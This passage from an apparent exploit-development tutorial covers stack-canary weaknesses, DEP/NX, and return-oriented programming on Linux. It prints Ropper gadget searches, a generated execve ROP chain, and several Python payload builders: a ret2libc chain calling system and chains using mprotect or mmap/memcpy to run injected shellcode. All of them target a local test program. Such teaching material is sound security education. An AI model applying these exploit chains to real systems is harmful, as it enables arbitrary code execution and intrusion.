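The 80 bytes of filler come from the layout of the Buffer structure, and the ordering of events is what makes the trick work. Here is a hedged sketch of both: `ctypes` computes the offset of the read pointer (with `c_uint64` standing in for 8-byte function pointers), and `run_main` is a toy replay of main in which the canary position (0x68) is a made-up value, since only the order of the call and the check matters.

```python
import ctypes
import struct

class Buffer(ctypes.Structure):
    _fields_ = [
        ("data", ctypes.c_char * 64),
        ("nSize", ctypes.c_int),
        ("write_fn", ctypes.c_uint64),  # stand-in for the `write` function pointer
        ("read_fn", ctypes.c_uint64),   # stand-in for the `read` function pointer
    ]

READ_OFF = Buffer.read_fn.offset
CANARY_OFF = 0x68  # hypothetical position, chosen only for this illustration

def run_main(payload: bytes, canary: bytes) -> list:
    frame = bytearray(0x200)
    frame[CANARY_OFF:CANARY_OFF + 8] = canary
    frame[0:len(payload)] = payload  # memcpy( pBuf->data, cpData, n )
    events = []
    read_ptr = struct.unpack_from("<Q", frame, READ_OFF)[0]
    if read_ptr:                     # if ( buf.read ) buf.read( &buf );
        events.append("call 0x%x" % read_ptr)
    intact = bytes(frame[CANARY_OFF:CANARY_OFF + 8]) == canary
    events.append("canary ok" if intact else "__stack_chk_fail")
    return events

payload = b"A" * READ_OFF + struct.pack("<Q", 0x7fffffffdd70 + 0x40) + b"\x90" * 0x80
print(READ_OFF, run_main(payload, bytes.fromhex("004fe8ce7d5f12e1")))
```

In the replay the canary is destroyed, yet the forged call is recorded first, which mirrors why the real check never gets a chance to run once the shellcode takes over.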
Okay, everything is in order, let’s shoot.

Other Strategies
Not all operating systems and compilers are created equal, and not all canary protection implementations are the same. Sometimes, they may be weak and improperly implemented, allowing them to be bypassed. Here are some of the shortcomings and how they can be exploited to bypass them:
- Static Canary/Cookie: Sometimes, the value of the secret canary is fixed and does not change with each run of the program. In this case, we simply write the known value back into its place. When it is verified at the end of the function, the condition will be met, and the protection will be broken.
- Weak Canary/Cookie: Sometimes, the value of the secret canary changes, but not completely. Only a small fraction of it changes each time the program runs. In this case, we can guess the canary value and then force the program to run several times until we encounter the correct value.
- Not All Buffers Are Protected: Compilers usually put this protection only on functions that have byte/string buffers (GCC's -fstack-protector, for example, instruments functions that call alloca or have buffers of at least 8 bytes). Another exploit opportunity arises when the vulnerable function does not contain any of those buffer types.
- Overwritable Canary/Cookie: In Windows, for example, this value lives somewhere in the PE image’s memory. If we have the ability to write to an arbitrary location in memory, we can change it to a value we know. For example, the mov qword ptr[RegisterA], RegisterB instruction copies data from register B to the memory that is referenced by register A. If we can control these registers, we can replace the original canary.
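For the weak canary case, a quick estimate tells us whether guessing is practical. This is a back-of-the-envelope sketch that assumes the unknown bits are uniformly random and drawn fresh on every run, and that we retry with the same guess each time; both function names are invented for this illustration.

```python
def expected_attempts(unknown_bits: int) -> int:
    """Mean number of runs until a fixed guess matches (geometric distribution)."""
    return 1 << unknown_bits

def success_probability(unknown_bits: int, attempts: int) -> float:
    """Chance that at least one of `attempts` independent runs matches the guess."""
    p_single = 1.0 / (1 << unknown_bits)
    return 1.0 - (1.0 - p_single) ** attempts

for bits in (8, 16, 56):
    print(bits, expected_attempts(bits), success_probability(bits, 1 << 16))
```

A canary with only 8 or 16 unpredictable bits falls within a few thousand runs, while a full 56 random bits (eight bytes minus the fixed null) is far out of reach for this approach.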
DEP / NX == No More Direct Code Execution
In this and previous articles, we’ve always relied on hijacking the flow of program execution by injecting malicious code onto the stack and forcing the program to execute it. This protection is specifically designed to prevent that. Even if an exploit bypasses the canary and gains control of the instruction pointer, the injected code will not be executed. As soon as the processor tries to execute instructions from the stack, it raises a fault, informing the operating system that something abnormal has occurred. The system raises an access violation exception and then terminates the process.
DEP stands for Data Execution Prevention. It mainly works in two modes:
- Hardware Level Support: Hardware-enforced DEP is for CPUs that can mark memory pages as Non-eXecutable (NX bit). In this mode, the processor itself can prevent the execution of any code from memory pages that are not supposed to be executed.
- Software Level Support: Software-enforced DEP is an alternative for CPUs that do not have hardware support. In this mode, the operating system itself intervenes to implement this layer of protection.
On Windows, DEP is configured at system boot according to the No-eXecute (NX) page protection policy setting within the boot configuration data. Depending on that policy setting, a specific application may be able to change the DEP setting for its own process. There are four policy modes:
- Opt-In: DEP is enabled only for operating system components, including the Windows kernel and drivers, plus any programs explicitly selected by administrators.
- Opt-Out: DEP is enabled for all programs and services except those in the exception list. If a particular program is not in the exceptions list, then DEP is enabled for that program.
- AlwaysOn: In this mode, DEP is enabled for all processes without any exceptions and cannot be turned off at runtime.
- AlwaysOff: This mode is the opposite of AlwaysOn, as DEP is disabled for all processes and cannot be turned on at runtime.
Each executable binary file contains information about each section and the permissions it requires, such as read, write, and execute permissions. In Windows PE files, for example, _IMAGE_SECTION_HEADER.Characteristics represents the permissions a section requires in memory. If the IMAGE_SCN_MEM_EXECUTE flag is set, the operating system leaves the “No-eXecute” bit clear for those memory pages. The same is true for ELF files, where ElfN_Shdr.sh_flags represents the permissions for each section. If the SHF_EXECINSTR flag is set, the data in that section is executable.
When we build code, the compiler and linker assign each section the permissions it needs when loaded into memory. By default, the stack’s permissions are read and write, not execute. That is why we used the -zexecstack option in the examples above: it tells the linker to mark the stack as executable, so when the operating system loads the binary into memory, it maps the stack memory pages as executable space.
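On Linux, the stack permission requested at link time is recorded in the PT_GNU_STACK program header of the ELF file (a detail not covered above, but it is where -zexecstack leaves its mark). The sketch below reads that flag from a little-endian ELF64 image; `stack_is_executable` and `synthetic_elf64` are names invented here, and the synthetic image exists only so the parser can be tried without a real binary.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type describing stack permissions
PF_X = 0x1                 # "execute" bit in p_flags

def stack_is_executable(elf: bytes):
    """True/False from PT_GNU_STACK's flags, or None if the header is absent."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(e_phnum):
        # In Elf64_Phdr, p_type and p_flags are the first two 32-bit fields
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None

def synthetic_elf64(stack_flags: int) -> bytes:
    """Minimal fake image (header + one program header), for demonstration only."""
    header = bytearray(64)
    header[:6] = b"\x7fELF\x02\x01"
    struct.pack_into("<Q", header, 0x20, 64)       # e_phoff
    struct.pack_into("<HH", header, 0x36, 56, 1)   # e_phentsize, e_phnum
    phdr = struct.pack("<II", PT_GNU_STACK, stack_flags) + bytes(48)
    return bytes(header) + phdr

print(stack_is_executable(synthetic_elf64(0x6)))  # read + write
print(stack_is_executable(synthetic_elf64(0x7)))  # read + write + execute
```

To inspect a real binary, pass the bytes of the file instead, for example `stack_is_executable(open("./test", "rb").read())`.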
Return Oriented Programming ( ROP )
Yes, we cannot redirect execution to the stack because this protection will prevent us, but we can still redirect execution to executable memory, for example, the executable section of the program itself and the libraries and modules loaded in the process address space. Let me explain more to you.
Any computer program works as follows: it executes a set of instructions sequentially, and when it encounters a return instruction, it pops the instruction pointer previously stored on the stack and continues executing at the memory that pointer refers to. When it encounters another return instruction, it does so again, and so on until it finishes.
We can exploit this by controlling the instruction pointer and its location, making the program jump to execute one or more instructions followed by a return instruction (ROP Gadget). When the return instruction is executed and the instruction pointer is retrieved again, it finds a fake address pointing to another instruction or instructions followed by a return instruction. We continue doing this as a chain until we achieve a satisfactory result.
A ROP gadget can be defined as one or more instructions followed by a return instruction located somewhere in a library, module, or executable section of the program itself. It can be used in sequence with other ROP gadgets to achieve a specific goal; this is called a ROP chain.
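The mechanics of a chain can be imitated with a tiny interpreter. This is a toy model, not an emulator: the addresses 0x1000 and 0x2000, the two gadgets, and the `run_chain` function are all invented for the illustration, and each "gadget" is a Python function that stands for a few instructions ending in ret.

```python
def pop_rdi(regs: dict, stack: list) -> None:
    regs["rdi"] = stack.pop(0)  # pop rdi

def pop_rsi(regs: dict, stack: list) -> None:
    regs["rsi"] = stack.pop(0)  # pop rsi

# Hypothetical gadget addresses mapped to what the gadget does before its `ret`
GADGETS = {0x1000: pop_rdi, 0x2000: pop_rsi}

def run_chain(stack, gadgets):
    """Follow a chain the way successive `ret` instructions would."""
    regs, trace = {}, []
    stack = list(stack)
    while stack:
        addr = stack.pop(0)       # `ret` pops the next address into RIP
        gadget = gadgets.get(addr)
        if gadget is None:
            break                 # unknown address: a real process would crash here
        trace.append(addr)
        gadget(regs, stack)       # the gadget may consume more stack slots
    return regs, trace

regs, trace = run_chain([0x1000, 0xdead, 0x2000, 0xbeef], GADGETS)
print({k: hex(v) for k, v in regs.items()}, [hex(a) for a in trace])
```

Each gadget does a small piece of work and hands control to the next address on the stack, so the data we place on the stack effectively becomes the program.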
We can hunt for the ROP gadgets we need using many tools. One of them is an amazing tool called Ropper, which provides us with many features that we need in return-oriented programming. For example, if we want to hunt for ROP gadgets in libc:
┌──(user㉿host)-[~]
└─$ ropper
(ropper)> file /usr/lib/x86_64-linux-gnu/libc.so.6
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] File loaded.
(libc.so.6/ELF/x86_64)>
We will run the tool and load the executable file using the file command as shown.

We can extract all ROP gadgets in that file using the gadget command, as shown in the picture above. We can also easily hunt for specific gadgets using the “search” command:
(libc.so.6/ELF/x86_64)> search pop rdi
[INFO] Searching for gadgets: pop rdi
[INFO] File: /usr/lib/x86_64-linux-gnu/libc.so.6
0x0000000000059c05: pop rdi; adc eax, 0xe762e800; std; jmp qword ptr [rsi - 0x70];
0x000000000017cd88: pop rdi; add ah, byte ptr [rdx - 0x4e]; and byte ptr [rdi], ah; ret;
0x0000000000179ec8: pop rdi; add ah, byte ptr [rdx - 0x4e]; and byte ptr [rsi], ah; ret;
0x00000000000d7a01: pop rdi; add byte ptr [rax], al; add byte ptr [rdi + rcx + 0x45], al; fsubr st(1); ret 0xfff0;
0x000000000011e7a2: pop rdi; add ebx, ebp; lahf; xor eax, eax; ret;
0x000000000016b267: pop rdi; add rax, rdi; shr rax, 2; vzeroupper; ret;
0x0000000000165b47: pop rdi; add rax, rdi; vzeroupper; ret;
0x000000000016c935: pop rdi; add rdi, 0x21; add rax, rdi; vzeroupper; ret;
0x000000000011072d: pop rdi; call rax;
0x000000000011072d: pop rdi; call rax; mov rdi, rax; mov eax, 0x3c; syscall;
0x00000000000f43ad: pop rdi; cmp eax, 0x8948fff3; ret 0x448b;
0x000000000016a927: pop rdi; cmp esi, dword ptr [rdi + rax]; jne 0x16a934; add rax, rdi; vzeroupper; ret;
0x00000000001671db: pop rdi; cmp sil, byte ptr [rdi + rax]; jne 0x1671e9; add rax, rdi; vzeroupper; ret;
0x000000000002d13c: pop rdi; jmp rax;
0x0000000000054968: pop rdi; mov dword ptr [rdi], 0; mov eax, 2; ret;
0x00000000000f9a10: pop rdi; mov eax, 0x3a; syscall;
0x0000000000100a1a: pop rdi; or al, ch; iretd; jns 0x100a12; jmp qword ptr [rsi - 0x7d];
0x0000000000100b60: pop rdi; or byte ptr [rax - 0x77], cl; pop rbp; add al, ch; test dword ptr [rax - 0xe], edi; jmp qword ptr [rsi - 0x7d];
0x0000000000110e0c: pop rdi; or eax, 0x64d8f700; mov dword ptr [rdx], eax; mov eax, 0xffffffff; ret;
0x00000000001420d2: pop rdi; out dx, al; dec dword ptr [rax - 0x77]; ret 0x8548;
0x000000000002a3fc: pop rdi; pop rbp; ret;
0x000000000015e700: pop rdi; cli; dec dword ptr [rax - 0x39]; ret 0xffff;
0x000000000002a205: pop rdi; ret;
The tool has collected all the gadgets related to the instruction we are looking for (pop rdi). We can also make the search more general.
(libc.so.6/ELF/x86_64)> search mov [rbx + 0x40],%
[INFO] Searching for gadgets: mov [rbx + 0x40],%
[INFO] File: /usr/lib/x86_64-linux-gnu/libc.so.6
0x00000000000a3bcf: mov dword ptr [rbx + 0x40], eax; and byte ptr [rbx + 0x50], 0xfe; mov qword ptr [rbx], rdi; mov dword ptr [rbx + 0x30], eax; call rcx;
0x00000000001161f5: mov dword ptr [rbx + 0x40], eax; mov eax, 1; add rsp, 8; pop rbx; pop rbp; ret;
0x000000000003fa47: mov dword ptr [rbx + 0x40], esi; pop rbx; ret;
0x000000000003fa28: mov dword ptr [rbx + 0x40], esi; xor eax, eax; pop rbx; ret;
0x000000000008ba03: mov dword ptr [rbx + 0x40], esp; mov dword ptr [rbx], eax; pop rbx; pop rbp; pop r12; ret;
0x000000000008be8e: mov dword ptr [rbx + 0x40], esp; pop rbx; pop rbp; pop r12; ret;
0x000000000008ba02: mov qword ptr [rbx + 0x40], r12; mov dword ptr [rbx], eax; pop rbx; pop rbp; pop r12; ret;
0x000000000008be8d: mov qword ptr [rbx + 0x40], r12; pop rbx; pop rbp; pop r12; ret;
0x00000000000a3bce: mov qword ptr [rbx + 0x40], r8; and byte ptr [rbx + 0x50], 0xfe; mov qword ptr [rbx], rdi; mov dword ptr [rbx + 0x30], eax; call rcx;
0x00000000001161f4: mov qword ptr [rbx + 0x40], rax; mov eax, 1; add rsp, 8; pop rbx; pop rbp; ret;
As you can see, we’ve made the tool search for any mov instruction that writes to the memory at [rbx + 0x40], regardless of the source operand. This is very useful because we will not always have gadgets that do exactly what we want. The alternative is to combine different instructions to achieve the same result indirectly. The tool also provides an amazing feature to build fully ready-to-use ROP chains for us.
(libc.so.6/ELF/x86_64)> ropchain execve cmd=id
[INFO] ROPchain Generator for syscall execve:
[INFO]
write command into data section
rax 0xb
rdi address to cmd
rsi address to null
rdx address to null
[INFO] Try to create chain which fills registers without delete content of previous filled registers
[*] Try permuation 1 / 24
[INFO]
[INFO] Look for syscall gadget
[INFO] syscall gadget found
[INFO] generating rop chain
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack
p = lambda x : pack('Q', x)
IMAGE_BASE_0 = 0x0000000000000000 # 2f1f84e0f4df64e0eb1829fabd8720136456dc4efce9962cb1188f8d436e30b0
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = ''
rop += rebase_0(0x000000000003c714) # 0x000000000003c714: pop r13; ret;
rop += '//////id'
rop += rebase_0(0x000000000002aa5f) # 0x000000000002aa5f: pop rbx; ret;
rop += rebase_0(0x00000000001e7000)
rop += rebase_0(0x000000000005e961) # 0x000000000005e961: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000003c714) # 0x000000000003c714: pop r13; ret;
rop += p(0x0000000000000000)
rop += rebase_0(0x000000000002aa5f) # 0x000000000002aa5f: pop rbx; ret;
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x000000000005e961) # 0x000000000005e961: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000002a205) # 0x000000000002a205: pop rdi; ret;
rop += rebase_0(0x00000000001e7000)
rop += rebase_0(0x000000000002bb39) # 0x000000000002bb39: pop rsi; ret;
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x000000000010d37d) # 0x000000000010d37d: pop rdx; ret;
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x0000000000043067) # 0x0000000000043067: pop rax; ret;
rop += p(0x000000000000003b)
rop += rebase_0(0x000000000008ed72) # 0x000000000008ed72: syscall; ret;
print(rop)
[INFO] rop chain generated!
As you can see, the tool has created a full ROP chain for us that performs the execve system call on our command (id). All we need to do is set the variable IMAGE_BASE_0 to the libc base address at runtime. Unfortunately, this feature is very limited: the tool cannot create chains for everything we need, nor can it be completely reliable, as the cases vary from program to program and from one bug to another.
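One practical note: the generated script starts with rop = '' and then appends the output of pack(), which is bytes under Python 3, so it raises a TypeError there. Below is a minimal Python 3 sketch of the same rebase idea. It is only a fragment showing the encoding, not a complete chain; the p64 and rebase names are my own helpers (not Ropper’s), and LIBC_BASE is just an example value from a debugging session without ASLR.

```python
from struct import pack

# Example value only; at runtime this must be the real libc base address.
LIBC_BASE = 0x7ffff7dae000


def p64(value):
    """Pack an integer as a little-endian 64-bit value."""
    return pack("<Q", value)


def rebase(offset, image_base=LIBC_BASE):
    """Turn a file offset reported by the tool into a runtime address."""
    return p64(image_base + offset)


rop = b""                # bytes, not str
rop += rebase(0x2a205)   # pop rdi; ret
rop += rebase(0x1e7000)  # data-section address used by the generated chain
rop += rebase(0x43067)   # pop rax; ret
rop += p64(0x3b)         # execve syscall number on x86-64 Linux
print(rop.hex())
```

String constants in the generated chain, such as '//////id', need the same treatment (b'//////id').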
Return To Libc ( ret2libc )
Let’s practice on the first example presented in this blog, and this time we will not compile it using the -zexecstack option.

Notice that the first time, when we compiled with the -zexecstack option, the exploitation succeeded and the shellcode executed successfully, but the second time, when we did not use that option, the exploitation failed and the shellcode did not execute.
We need to change our code execution strategy so that instead of making the program jump to the code injected into the stack, we make it return into libc and run the system function, which allows us to run commands on the system. The system function takes exactly one argument: the command as a null-terminated string. According to the x86-64 Linux calling convention, the first argument of any function call is passed in the rdi register, so we need a ROP gadget that loads our command address into rdi, and once this gadget returns, the next saved instruction pointer should be another gadget that calls the system function.

Great. Using the Peda searchmem command, we found the string “id” in the C library that we will use as a parameter to the system function.
gdb-peda$ x/s 0x7ffff7f5a078
0x7ffff7f5a078: "id"
Okay, now we need a ROP gadget that loads this pointer into the RDI register. A typical ROP gadget is pop rdi; ret, so we’ll replace the instruction pointer with the address of that gadget and put the command address right after it. Now, we’re ready to call the system function. We’ll follow the same approach: we’ll put the address of the system function on the stack, use the pop rax; ret gadget to load it, and then use a call rax gadget. But then the process will crash, because once the system function finishes and returns, the next instruction pointer will be an address that is not under our control. So, we must call the exit function afterward to close the program properly. Fortunately, I found a gadget that calls a register (call rax) and then calls the exit function, so we don’t have to do it ourselves.
(gdb) x/3i 0x7ffff7dd7d66
0x7ffff7dd7d66 <__libc_start_call_main+118>: call *%rax
0x7ffff7dd7d68 <__libc_start_call_main+120>: mov %eax,%edi
0x7ffff7dd7d6a <__libc_start_call_main+122>: call 0x7ffff7df0280 <__GI_exit>
(gdb)
We build our ROP chain as follows:
def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x112 # Fills the stack frame
    payload += struct.pack( "<Q", canary ) # Places the correct canary value
    payload += b"B" * 0x8 # Base pointer
    payload += struct.pack( "<Q", 0x7ffff7dd8205 ) # pop rdi; ret
    payload += struct.pack( "<Q", 0x7ffff7f5a078 ) # The command address ( id )
    payload += struct.pack( "<Q", 0x7ffff7df1067 ) # pop rax; ret
    payload += struct.pack( "<Q", 0x7ffff7e008f0 ) # system function address
    payload += struct.pack( "<Q", 0x7ffff7dd7d66 ) # call rax ; system( "id" ); exit( 0 )
    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()
Let’s try this strategy against the program and see if it works.

Force Disable DEP Protection & Execute Arbitrary Code
Operating systems provide low-level APIs that allow us to modify the permissions of memory pages at runtime. Windows, for example, provides an API called VirtualProtect and an even lower-level native API called NtProtectVirtualMemory that does this. On the other hand, Unix-based systems provide similar APIs that accomplish the same task, such as mprotect. These facts can be abused to force the targeted program to execute our evil instructions.
We can abuse the mprotect function to make the stack executable and then force the program to execute instructions injected into the stack. The mprotect declaration is as follows:
int mprotect(void addr[.size], size_t size, int prot);
It takes exactly three parameters:
- addr: The starting address of the memory region, which must be aligned to the page boundary.
- size: The length in bytes of the address range.
- prot: The desired access protection, such as PROT_READ, PROT_WRITE, and PROT_EXEC.
According to the Linux x64 calling convention, the three parameters must be passed through the RDI, RSI, and RDX registers. We need to build a ROP chain that performs the following:
- Set RDI to a stack address aligned to the page boundary, which can be done by writing that address onto the stack and retrieving it via a pop gadget (pop rdi; ret).
- Set RSI to the desired size by writing it onto the stack and retrieving it via a pop gadget (pop rsi; ret).
- Set RDX to the desired protection by writing it onto the stack and retrieving it via a pop gadget (pop rdx; ret).
- Put the direct address of mprotect on the stack as a return address so that the program jumps directly to executing it.
- Put the shellcode address right after the mprotect address so that it gets executed once the API returns.
def hijack_exec(p: Popen, canary):
    shellcode = 0x7fffffffddb0 + 0x40 # Shellcode Address
    stack_page = shellcode & 0xfffffffffffff000 # Align the address to the page boundary.
    payload = b""
    payload += b"A" * 0x112 # Fills the stack frame
    payload += struct.pack( "<Q", canary ) # Places the correct canary value
    payload += b"B" * 0x8 # Base pointer
    payload += struct.pack( "<Q", 0x7ffff7dd8205 ) # pop rdi; ret
    payload += struct.pack( "<Q", stack_page ) # The aligned stack page address
    payload += struct.pack( "<Q", 0x7ffff7dd9b39 ) # pop rsi; ret
    payload += struct.pack( "<Q", 0x1000 ) # Page size
    payload += struct.pack( "<Q", 0x7ffff7ebb37d ) # pop rdx; ret
    payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 ) # Protections: PROT_READ=0x01, PROT_WRITE=0x02, PROT_EXEC=0x04
    payload += struct.pack( "<Q", 0x7ffff7ebb200 ) # mprotect function address
    payload += struct.pack( "<Q", shellcode ) # Jump into shellcode
    payload += b"\x90" * 0x40 # NOPs for padding
    payload += buf # Shellcode
    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()
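The page-alignment step deserves a closer look. If the NOP sled plus the shellcode happens to cross into the next page, a single 0x1000-byte range starting at the aligned address does not cover all of it. The following is a minimal sketch of how the range could be computed, assuming a 4 KiB page size; the helper names and the payload lengths are mine, chosen only for illustration.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages


def page_align_down(addr, page_size=PAGE_SIZE):
    """Round an address down to the start of its page."""
    return addr & ~(page_size - 1)


def mprotect_range(start, length, page_size=PAGE_SIZE):
    """Return (aligned_start, aligned_length) covering [start, start + length)."""
    base = page_align_down(start, page_size)
    end = start + length
    aligned_end = (end + page_size - 1) & ~(page_size - 1)
    return base, aligned_end - base


shellcode = 0x7fffffffddb0 + 0x40  # same example address as in the exploit

# A 0x200-byte payload stays inside one page.
print([hex(v) for v in mprotect_range(shellcode, 0x200)])
# A 0x300-byte payload spills into the next page, so two pages are needed.
print([hex(v) for v in mprotect_range(shellcode, 0x300)])
```

In the exploit above, 0x1000 is enough as long as the whole payload fits before the next page boundary.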
Let’s run this exploitation strategy and see what happens.

Alternatively, in Windows, it is possible to use functions like NtSetInformationProcess and SetProcessDEPPolicy to disable such protection and make the memory executable, depending on the configured DEP mode. In Unix-based systems, there are some similar methods: we can call a low-level API called personality and pass it the READ_IMPLIES_EXEC flag, which makes memory that is mapped afterwards executable even if it was not mapped with execute permissions (this will not work on previously created heaps).
One effective method is to map new memory with execute permissions, then move the malicious instructions to that memory and redirect the execution flow of the program to execute those instructions. In Windows, there are several low-level APIs that help with this, such as VirtualAlloc, NtAllocateVirtualMemory, WriteProcessMemory, and NtWriteVirtualMemory. On the other hand, Unix-based systems have functions that do the same thing, such as mmap. Let’s follow this approach in developing our own exploit.
We need to build a ROP chain that does exactly the following:
pExecutableMemory = mmap( NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0 );
memcpy( pExecutableMemory, pShellcode, ulShellSize );
pExecutableMemory(); // jmp/call pExecutableMemory
The mmap declaration is exactly as follows:
void *mmap(void addr[.length], size_t length, int prot, int flags, int fd, off_t offset);
It takes the following parameters:
- addr: The starting address for the new mapping, or NULL to let the kernel choose it.
- length: The length of the mapping.
- prot: The desired access protection, such as PROT_READ, PROT_WRITE, and PROT_EXEC.
- flags: This determines whether updates to the mapping are visible to other processes mapping the same region, and whether updates are carried through to the underlying file.
- fd: The file descriptor (this argument is ignored when the MAP_ANONYMOUS flag is used).
- offset: The offset of the mapped memory in fd (this argument must be zero when using the MAP_ANONYMOUS flag).
Reminder: According to the x64 Linux calling convention, the six parameters are passed to functions through registers in this order: rdi, rsi, rdx, rcx, r8, r9. So to call that API we need to build a ROP chain that does the following:
- Set rdi to NULL. I could find neither a mov rdi, 0; ret nor a xor rdi, rdi; ret gadget, so the alternative is pop rdi; ret, with zeros on the stack immediately after the gadget address (we have no problem with \x00, as it is not a bad byte for the vulnerable program).
- Set rsi to the appropriate size, for example 0x1000 (the memory page size). The gadget pop rsi; ret is convenient.
- Set rdx to the desired protections (PROT_EXEC|PROT_READ|PROT_WRITE). We’ll use pop rdx; ret for that.
- Set rcx to the desired flags (MAP_ANONYMOUS|MAP_SHARED). We’ll use pop rcx; add eax, 0x1734ba; ret for that. This gadget changes the eax value, but we don’t care about the eax register right now, so that’s OK.
- Set r8 to -1, which is 0xffffffffffffffff as a 64-bit value, so we’ll write this to the stack and retrieve it with the pop r8; ret gadget.
- The last parameter is zero, so register r9 should be set to zero, but at this point it already holds zero, so we don’t have to do anything with it.
- Put the mmap address on the stack as a return address so that the function is called after all its parameters have been set.
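The register plan above can be written down as a small Python sketch. The constant values are the x86-64 Linux ones used in this post; the ARG_REGISTERS tuple and the as_qword helper are names I made up for illustration.

```python
import struct

# Argument registers, in the order used in this post for a libc function call.
ARG_REGISTERS = ("rdi", "rsi", "rdx", "rcx", "r8", "r9")

# Flag values on x86-64 Linux.
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
MAP_SHARED, MAP_ANONYMOUS = 0x01, 0x20


def as_qword(value):
    """Encode a (possibly negative) integer as the 8 bytes a pop gadget loads."""
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


# mmap( NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0 )
mmap_args = (0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
             MAP_SHARED | MAP_ANONYMOUS, -1, 0)
register_plan = dict(zip(ARG_REGISTERS, mmap_args))

for reg, value in register_plan.items():
    print(reg, as_qword(value).hex())
```

Note how -1 becomes eight 0xff bytes, which is exactly what gets placed on the stack after the pop r8; ret gadget.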
The next step is to copy our malicious code to the memory allocated by mmap using the memcpy function. The memcpy function is declared as follows:
void *memcpy(void dest[restrict .n], const void src[restrict .n], size_t n);
It takes exactly three parameters:
- dest: The destination memory address to copy to.
- src: The source memory address to copy from.
- n: Number of bytes to be copied.
To do this we must complete our ROP chain as follows:
- Set rdi to the address of the mapped memory, which mmap returns in the rax register. Unfortunately, I couldn’t find an appropriate gadget that moves the rax value to rdi, like mov rdi, rax; ret or push rax; pop rdi; ret, but thank God, I managed to find a gadget that swaps them: xchg rdi, rax; cld; ret;.
- Set rsi to the shellcode address, which is on the stack. The gadget pop rsi; ret comes to the rescue again.
- Set rdx to the shellcode size. As before, we’ll use pop rdx; ret.
- Put the memcpy address on the stack as a return address so that it gets executed.
Now everything is in order, and we just need to jump into that executable memory to make our shellcode run. At this point, the rdi register holds the address of the executable memory (where the shellcode now lives), so we need a gadget like jmp rdi or call rdi (the shellcode will kill the process, so we don’t care whether flow control is lost or not). But I found an alternative gadget, which is push rdi; adc al, 0x48; lea eax, [rdi + 0x15]; ret;. This gadget pushes the executable memory address onto the stack, adds the carry flag + 0x48 to al, and then loads rdi + 0x15 into eax (the side effects are harmless here, so it’s valid and convenient). Once the gadget returns, the next return address will be the shellcode, thanks to the push instruction.
def hijack_exec(p: Popen, canary):
    shellcode = 0x7fffffffddb0 + 0x40 # Shellcode Address
    payload = b""
    payload += b"A" * 0x112 # Fills the stack frame
    payload += struct.pack( "<Q", canary ) # Places the correct canary value
    payload += b"B" * 0x8 # Base pointer
    payload += struct.pack( "<Q", 0x7ffff7dd8205 ) # pop rdi; ret
    payload += b"\x00" * 0x8 # addr = NULL
    payload += struct.pack( "<Q", 0x7ffff7dd9b39 ) # pop rsi; ret
    payload += struct.pack( "<Q", 0x1000 ) # Page size
    payload += struct.pack( "<Q", 0x7ffff7ebb37d ) # pop rdx; ret
    payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 ) # Protections: PROT_READ=0x01, PROT_WRITE=0x02, PROT_EXEC=0x04
    payload += struct.pack( "<Q", 0x7ffff7ded94c ) # pop rcx; add eax, 0x1734ba; ret;
    payload += struct.pack( "<Q", 0x01 | 0x20 ) # flags: MAP_SHARED=0x01 MAP_ANONYMOUS=0x20
    payload += struct.pack( "<Q", 0x7ffff7fd9efb ) # pop r8; ret
    payload += b"\xff" * 0x8 # fd = -1
    payload += struct.pack( "<Q", 0x7ffff7eba9a0 ) # mmap( NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0 )
    payload += struct.pack( "<Q", 0x7ffff7f288a1 ) # xchg rdi, rax; cld; ret;
    payload += struct.pack( "<Q", 0x7ffff7dd9b39 ) # pop rsi; ret
    payload += struct.pack( "<Q", shellcode ) # Shellcode address
    payload += struct.pack( "<Q", 0x7ffff7ebb37d ) # pop rdx; ret
    payload += struct.pack( "<Q", len(buf) + 0x40 ) # Shellcode size for memcpy
    payload += struct.pack( "<Q", 0x7ffff7feb6e0 ) # memcpy( exec_mem, shellcode, shellsize )
    # Execute the shellcode
    payload += struct.pack( "<Q", 0x7ffff7e5ce42 ) # push rdi; adc al, 0x48; lea eax, [rdi + 0x15]; ret;
    payload += b"\x90" * 0x40 # NOPs for padding
    payload += buf # Shellcode
    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()
Let’s fire:


Address Space Layout Randomization ( ASLR )
